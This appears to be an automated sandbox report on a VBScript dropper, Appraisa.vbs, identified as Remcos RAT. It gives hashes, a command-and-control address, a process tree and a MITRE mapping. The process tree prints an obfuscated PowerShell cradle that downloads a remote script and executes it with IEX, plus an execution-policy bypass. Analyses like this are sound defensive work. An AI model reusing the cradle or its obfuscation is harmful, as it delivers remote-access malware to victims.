Overview

overview

10

Static

static

Appraisa.vbs

windows7_x64

10

Appraisa.vbs

windows10_x64

10

Analysis

  • max time kernel
    152s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    21-04-2021 13:20

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Appraisa.vbs

  • Size

    662B

  • MD5

    2e95d045ff86903502b52f5fd0976aad

  • SHA1

    c74e479ff249f1e8c248b8a67e318a61b1f1d5e4

  • SHA256

    dae93e987a854255ff55ce9f62729f17f57d3f8a56933a57cb8de89b698e81f0

  • SHA512

    0427fa613d91d41c98dfb7d9a964c74857813959f427eb060a1a39c2cf289235aaa0aec6015cea8d7bd16da1e14bae3ba88c998780d33ea6faf9d0b8102264df

Score
10/10
remcosrat

Malware Config

Extracted

Family

remcos

C2

194.5.97.183:8888

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Appraisa.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1996
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1220
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1060
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          4⤵
          • Suspicious use of SetWindowsHookEx
          PID:816

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    4ff6b3014913b3061196d6fb28246928

    SHA1

    720504ad8a352f0451e65e93782c5b13e703724e

    SHA256

    ed1689551a0c6f83161b7541e8026dee76f7efe3abe83f970f1bddcbad7a22f6

    SHA512

    b63183e88eddaa83caedde4f60619b74c50a7abd294d63347ff5052d35fb8320f66c607bf91c05766fd3aa0f9d00cac84e64a8d7e39ce88aab7720a224d27b5c

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    10479ae2f624cc587efe1b5466dca98b

    SHA1

    c82509ea15f7cfbfc2a01e278567827f7d6baff3

    SHA256

    a9d4b00114fa4925fb755e98c6434a0d095c4aad2be3de20ded01834eedcd983

    SHA512

    4626e859f8704e73c988fc551c25bc628856297a2d19cf8393aa94e0f9e02c84a97abb907b2138d16ab8758b01ffbe80aefc065173ed3a068d5acb18cdb9e5b1

    Download Submit
  • C:\Users\Public\ Microsoft.ps1
    MD5

    eda0264cc0baa7804ce2a32a99aa9b98

    SHA1

    274b4d04e802370cac624649ea30149dded4e053

    SHA256

    950cc79c3173d2a1ad76a7b8e64c9100ca929caf0201396758380ff2d712680f

    SHA512

    43f6dd07e297c157f54147aa34512b4812f2650f990865c81181e14d379bf12352fcc3c2d20fbfb535d8bf2a3b5ebc7ab6aa0cd47ab498f0d1f5818e41bf9a74

    Download Submit
  • memory/816-87-0x0000000000400000-0x0000000000478000-memory.dmp
    Filesize

    480KB

    Download
  • memory/816-86-0x00000000767B1000-0x00000000767B3000-memory.dmp
    Filesize

    8KB

    Download
  • memory/816-85-0x000000000042EEEF-mapping.dmp
    Download
  • memory/816-84-0x0000000000400000-0x0000000000478000-memory.dmp
    Filesize

    480KB

    Download
  • memory/1060-71-0x0000000000000000-mapping.dmp
    Download
  • memory/1060-77-0x000000001ACF0000-0x000000001ACF2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1060-83-0x00000000027A0000-0x00000000027B8000-memory.dmp
    Filesize

    96KB

    Download
  • memory/1060-78-0x000000001ACF4000-0x000000001ACF6000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1220-67-0x000000001AC54000-0x000000001AC56000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1220-68-0x00000000022C0000-0x00000000022C1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1220-69-0x000000001AB80000-0x000000001AB81000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1220-66-0x000000001AC50000-0x000000001AC52000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1220-70-0x000000001C8B0000-0x000000001C8B1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1220-65-0x0000000002560000-0x0000000002561000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1220-64-0x000000001ACD0000-0x000000001ACD1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1220-63-0x0000000002280000-0x0000000002281000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1220-61-0x0000000000000000-mapping.dmp
    Download
  • memory/1996-60-0x000007FEFC051000-0x000007FEFC053000-memory.dmp
    Filesize

    8KB

    Download